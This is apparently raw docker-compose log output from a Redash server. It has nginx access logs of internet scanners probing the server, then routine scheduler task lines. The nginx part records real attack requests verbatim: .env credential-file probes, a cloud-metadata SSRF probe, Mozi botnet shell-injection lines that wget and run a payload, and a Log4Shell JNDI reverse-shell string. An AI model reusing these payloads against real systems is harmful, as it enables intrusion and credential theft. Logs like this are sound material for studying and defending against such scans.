nginx_1             | 70.37.106.128 - - [14/Dec/2021:16:41:48 +0000] "POST / HTTP/1.1" 405 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 23.129.64.137 - - [14/Dec/2021:16:50:34 +0000] "GET http://169.254.169.254/latest/meta-data/ HTTP/1.1" 302 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
nginx_1             | 23.129.64.137 - - [14/Dec/2021:16:50:35 +0000] "GET http://169.254.169.254/login?next=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 799 "http://169.254.169.254/latest/meta-data/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
nginx_1             | 154.89.5.70 - - [14/Dec/2021:17:12:44 +0000] "GET / HTTP/1.0" 302 299 "-" "-" "-"
nginx_1             | 80.82.77.192 - - [14/Dec/2021:17:23:26 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"
nginx_1             | 80.82.77.192 - - [14/Dec/2021:17:23:27 +0000] "GET /login?next=http%3A%2F%2FHOST_IP%2F HTTP/1.1" 200 799 "http://HOST_IP:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"
nginx_1             | 44.224.32.42 - - [14/Dec/2021:17:35:17 +0000] "GET /.env HTTP/1.1" 302 297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 44.224.32.42 - - [14/Dec/2021:17:35:18 +0000] "POST / HTTP/1.1" 405 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 192.241.211.129 - - [14/Dec/2021:18:12:40 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 zgrab/0.x" "-"
nginx_1             | 209.17.97.58 - - [14/Dec/2021:18:13:13 +0000] "GET / HTTP/1.0" 302 291 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
nginx_1             | 209.17.96.42 - - [14/Dec/2021:18:24:27 +0000] "\x16\x03\x01\x00\xE3\x01\x00\x00\xDF\x03\x03\x1F\xCE\xA9}\xE1Q\x05\xB3\x19|Aa\xE1\x91\xCD\x12_Kq~\xF9\xED\xA3{\x09\xD7\xD6\xEA\x0B\xFCwc\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0" 400 173 "-" "-" "-"
nginx_1             | 206.189.18.184 - - [14/Dec/2021:18:28:22 +0000] "GET /.env HTTP/1.1" 302 297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 206.189.18.184 - - [14/Dec/2021:18:28:23 +0000] "POST / HTTP/1.1" 405 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 206.189.21.147 - - [14/Dec/2021:18:28:44 +0000] "GET /.env HTTP/1.1" 302 297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 206.189.21.147 - - [14/Dec/2021:18:28:45 +0000] "POST / HTTP/1.1" 405 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
nginx_1             | 192.241.208.174 - - [14/Dec/2021:18:34:09 +0000] "GET /portal/redlion HTTP/1.1" 302 321 "-" "Mozilla/5.0 zgrab/0.x" "-"
nginx_1             | 40.86.210.118 - - [14/Dec/2021:18:38:44 +0000] "GET /.env HTTP/1.1" 302 297 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.42.2.el7.x86_64" "-"
nginx_1             | 40.86.210.118 - - [14/Dec/2021:18:38:44 +0000] "GET /login?next=http%3A%2F%2FHOST_IP%2F.env HTTP/1.1" 200 799 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.42.2.el7.x86_64" "-"
nginx_1             | 185.180.143.8 - - [14/Dec/2021:19:08:06 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
nginx_1             | 185.180.143.8 - - [14/Dec/2021:19:08:07 +0000] "GET /login?next=http%3A%2F%2FHOST_IP%2F HTTP/1.1" 200 799 "http://HOST_IP/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
nginx_1             | 162.142.125.58 - - [14/Dec/2021:19:08:31 +0000] "GET / HTTP/1.1" 302 299 "-" "-" "-"
nginx_1             | 162.142.125.58 - - [14/Dec/2021:19:08:32 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
nginx_1             | 162.142.125.58 - - [14/Dec/2021:19:08:32 +0000] "GET /login HTTP/1.1" 200 799 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
nginx_1             | 60.185.49.49 - - [14/Dec/2021:19:13:38 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://60.185.49.49:43197/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 611 "-" "Hello, world" "-"
nginx_1             | 92.118.161.29 - - [14/Dec/2021:19:28:10 +0000] "GET / HTTP/1.0" 302 291 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-"
nginx_1             | 139.59.118.206 - - [14/Dec/2021:20:13:17 +0000] "GET / HTTP/1.0" 302 291 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:33 +0000] "GET / HTTP/1.0" 302 291 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:33 +0000] "lv|'|'|VHJvamFuX0M0NkY2RTk=|'|'|MARK|'|'|user|'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:33 +0000] "Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``\x98\xC3\xC0\xC0\xC0\x06\xC4\x8C@\xBCQ\x96\x81\x81\x09H\x07\xA7\x16\x95e&\xA7*\x04$&g+\x182\x94\xF6\xB000\xAC\xA8rc\x00\x01\x11\xA0\x82\x1F\x5C`&\x83\xC7K7\x86\x19\xE5n\x0C9\x95n\x0C;\x84\x0F3\xAC\xE8sch\xA8^\xCF4'J\x97\xA9\x82\xE30\xC3\x91h]&\x90\xF8\xCE\x97S\xCBA4L?2=\xE1\xC4\x92\x86\x0B@\xF5`\x0CT\x1F\xAE\xAF]" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:34 +0000] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:34 +0000] "H\x00\x00\x00tj\xA8\x9E#D\x98+\xCA\xF0\xA7\xBBl\xC5\x19\xD7\x8D\xB6\x18\xEDJ\x1En\xC1\xF9xu[l\xF0E\x1D-j\xEC\xD4xL\xC9r\xC9\x15\x10u\xE0%\x86Rtg\x05fv\x86]%\xCC\x80\x0C\xE8\xCF\xAE\x00\xB5\xC0f\xC8\x8DD\xC5\x09\xF4" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:35 +0000] "HELP" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:35 +0000] "\x1B\x84\xD5\xB0]\xF4\xC4\x93\xC50\xC2X\x8C\xDA\xB1\xD7\xAC\xAFn\x1D\xE1\x1E\x1A3*\x85\xB7\x1D'\xB1\xC9k\xBF\xF0\xBC" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:36 +0000] "batman" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:36 +0000] "\x16\x03\x01\x00t\x01\x00\x00p\x03\x01YF}\xF6\x7F3\xD3\xA2'O\xAE\xB6\x041p\x87F\xE5\xA6\xA2\x18\xD1\x0B}\x0C\x9FO)u\xFE\xB1\xD9\x00\x00\x18\xC0\x14\xC0\x13\x005\x00/\xC0" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:37 +0000] "\x01\x82\x00\x00\x00\x01,\xEF:\xE7\x89\xFEH\xAF\xAC\xF8\xC1Pq\xD7\xC3\xE8S\x8A\xD6:\x17\xD93\x14o)S}\xBB\xBB\x97b\xCE\xB6\x0B\x9B\xB97>\x01\xCFv\xAE\xA0E\xB6D\xEA\xE1\xEAA\xC4\xDB\xEE\x09\xAC\xFB\xF0\x84)k\xBBc\x18]V\x85V\xC5_\x05T\x0Bt\xC4\x0B\xBE\xB5w\xBCM=[1\xE1\x06\x9C\xFD\xD3g^\xE3\x01\x9BK\xD7\xFC>\xFFk\xAF\x95\x99\xFB\xDBH\x90\x8BD\x88`k\x92\xF5e\x1C\xAA\xBB{_LP\x15\x85\x1E\x0E\x8F\xDD\xC5J" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:37 +0000] "\xBD\xFF\x9E\xFFE\xFF\x9E\xFF\xBD\xFF\x9E\xFF\xA4\xFF\x86\xFF\xC4\xFF\xBE\xFF\xC7\xFF\xDB\xFF\xEE\xFFx\x5Cd9\xFF\xED\xFF\xA4\xFF\x9D\xFF\xCF\xFF\xD8\xFF\xE5\xFF\x04\xFF\x12\xFF0\xFF\xB1\xFF\xBD\xFF\xE7\xFF\xE2\xFF\xDD\xFF\xDC\xFF\xDE\xFF\xC8\xFF\xCC\xFF\xBE\xFF\xF8\xFF&\xFF\x01\xFF\x0F\xFF\xF5\xFF\x06\xFF\xFF\xFF\xF7\xFF!\xFF\xDE\xFF\x02\xFF&\xFF\x0C\xFF\x01\xFF\xF5\xFF" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:38 +0000] "A\x00\x00\x00\x03fH\xBBd~\x8E\xFC\x94g\xD2\xDB\xFC\xEE\x8D\xFF\x98 \xB1\xBET\xA4\x9AZ\x9A\xA0?\x90\xE0\xF2t0\x5C\xED\xAE\xACX\x98\xDEJ\xEC\xF2\xC8\x9Cl\xD0\x9C\xC0\xE0\x98\x12\x8F\xE7\xCB\x8F\xA1\xA3\x16\xF1J\xA9<\xBD\xDA`" 400 173 "-" "-" "-"
nginx_1             | 178.62.22.232 - - [14/Dec/2021:20:13:38 +0000] "\x09\x12;Bo3\xA2D\xFD\x01\x86si=\xAE\x12\xBB\xC6\x19\xFD\x1A:\xF3\x11\xC9\xAE\xDA<0\xBC8\x81\x9E\x00\x0F\xCAN\xFB\x05\xC6\xDE\xB7<oN\x01\xA2\x87\x82\xF5/\x8E\xED*\x1F\x0E\xB7C\x0C\xA04]\xBD\x80PVf\x1A\x11\xAF\xF5\xC8\xA3\x16+b\xB1\xD7" 400 173 "-" "-" "-"
nginx_1             | 18.206.120.5 - - [14/Dec/2021:20:41:12 +0000] "GET /.env HTTP/1.1" 302 297 "-" "MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24" "-"
nginx_1             | 18.206.120.5 - - [14/Dec/2021:20:41:12 +0000] "POST / HTTP/1.1" 405 178 "-" "MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24" "-"
nginx_1             | 88.225.235.140 - - [14/Dec/2021:21:22:33 +0000] "GET / HTTP/1.0" 302 289 "-" "-" "-"
nginx_1             | 186.33.86.197 - - [14/Dec/2021:21:24:19 +0000] "GET / HTTP/1.1" 302 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
nginx_1             | 157.245.108.125 - - [14/Dec/2021:22:04:17 +0000] "GET / HTTP/1.0" 302 291 "-" "borchuk/3.1 ${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}" "-"
nginx_1             | 208.68.93.226 - - [14/Dec/2021:22:07:56 +0000] "GET / HTTP/1.1" 302 289 "-" "Python/3.9 aiohttp/3.8.1" "-"
nginx_1             | 208.68.93.226 - - [14/Dec/2021:22:07:56 +0000] "GET /login?next=http://HOST_IP/ HTTP/1.1" 200 799 "-" "Python/3.9 aiohttp/3.8.1" "-"
nginx_1             | 109.248.6.39 - - [14/Dec/2021:22:11:43 +0000] "GET / HTTP/1.0" 302 291 "-" "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-"
nginx_1             | 185.56.80.65 - - [14/Dec/2021:22:38:54 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
nginx_1             | 45.129.56.200 - - [14/Dec/2021:22:38:58 +0000] "GET /login?next=http%3A%2F%2FHOST_IP%2F HTTP/1.1" 200 799 "http://HOST_IP/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
nginx_1             | 23.129.64.140 - - [14/Dec/2021:22:39:00 +0000] "GET /favicon.ico HTTP/1.1" 302 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
nginx_1             | 23.129.64.140 - - [14/Dec/2021:22:39:01 +0000] "GET /login?next=http%3A%2F%2FHOST_IP%3A80%2Ffavicon.ico HTTP/1.1" 200 799 "http://HOST_IP:80/favicon.ico" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
nginx_1             | 34.77.162.15 - - [14/Dec/2021:23:23:23 +0000] "\x16\x03\x01\x00\xE3\x01\x00\x00\xDF\x03\x03\xA1\x03" 400 173 "-" "-" "-"
nginx_1             | 81.70.96.150 - - [15/Dec/2021:00:08:48 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
nginx_1             | 81.70.96.150 - - [15/Dec/2021:00:08:48 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
nginx_1             | 64.62.197.92 - - [15/Dec/2021:00:54:45 +0000] "GET / HTTP/1.1" 302 289 "-" "-" "-"
nginx_1             | 186.226.219.110 - - [15/Dec/2021:01:49:45 +0000] "GET / HTTP/1.1" 302 299 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:36 +0000] "GET /.env HTTP/1.1" 302 297 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:38 +0000] "GET /conf/.env HTTP/1.1" 302 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:39 +0000] "GET /wp-content/.env HTTP/1.1" 302 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:41 +0000] "GET /wp-admin/.env HTTP/1.1" 302 319 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:43 +0000] "GET /library/.env HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:44 +0000] "GET /new/.env HTTP/1.1" 302 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:46 +0000] "GET /vendor/.env HTTP/1.1" 302 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:47 +0000] "GET /old/.env HTTP/1.1" 302 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:48 +0000] "GET /local/.env HTTP/1.1" 302 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:50 +0000] "GET /api/.env HTTP/1.1" 404 101 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:51 +0000] "GET /blog/.env HTTP/1.1" 302 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:53 +0000] "GET /crm/.env HTTP/1.1" 302 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:54 +0000] "GET /admin/.env HTTP/1.1" 302 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:56 +0000] "GET /laravel/.env HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:57 +0000] "GET /app/.env HTTP/1.1" 302 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:29:58 +0000] "GET /app/config/.env HTTP/1.1" 302 327 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:00 +0000] "GET /apps/.env HTTP/1.1" 302 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:02 +0000] "GET /audio/.env HTTP/1.1" 302 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:03 +0000] "GET /cgi-bin/.env HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:05 +0000] "GET /backend/.env HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:06 +0000] "GET /src/.env HTTP/1.1" 302 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:08 +0000] "GET /base/.env HTTP/1.1" 302 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:09 +0000] "GET /core/.env HTTP/1.1" 302 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:10 +0000] "GET /vendor/laravel/.env HTTP/1.1" 302 335 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:11 +0000] "GET /storage/.env HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:11 +0000] "GET /protected/.env HTTP/1.1" 302 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:13 +0000] "GET /newsite/.env HTTP/1.1" 302 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:14 +0000] "GET /www/.env HTTP/1.1" 302 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:16 +0000] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 302 373 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:17 +0000] "GET /database/.env HTTP/1.1" 302 319 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:19 +0000] "GET /public/.env HTTP/1.1" 302 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:19 +0000] "GET /ec2-52-220-228-35.ap-southeast-1.compute.amazonaws.com/.env HTTP/1.1" 302 411 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:21 +0000] "POST / HTTP/1.1" 405 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 40.65.99.132 - - [15/Dec/2021:02:30:22 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 413 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" "-"
nginx_1             | 118.249.58.229 - - [15/Dec/2021:02:36:48 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 607 "-" "Hello, world" "-"
nginx_1             | 123.28.167.94 - - [15/Dec/2021:03:14:06 +0000] "GET / HTTP/1.1" 302 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"

scheduler_1         | [2021-12-15 03:24:25,944][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:24:55,944][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:25:24,318][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:25:25,944][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:25:55,964][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:26:24,329][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:26:25,964][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:26:55,965][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:27:24,348][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:27:25,965][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:27:55,980][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:28:19,770][PID:14][INFO][Beat] Scheduler: Sending due task cleanup_query_results (redash.tasks.cleanup_query_results)
scheduler_1         | [2021-12-15 03:28:24,348][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:28:25,980][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:28:56,000][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:29:24,367][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:29:26,003][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:29:56,017][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:30:24,386][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:30:26,017][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:30:56,017][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:31:24,404][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
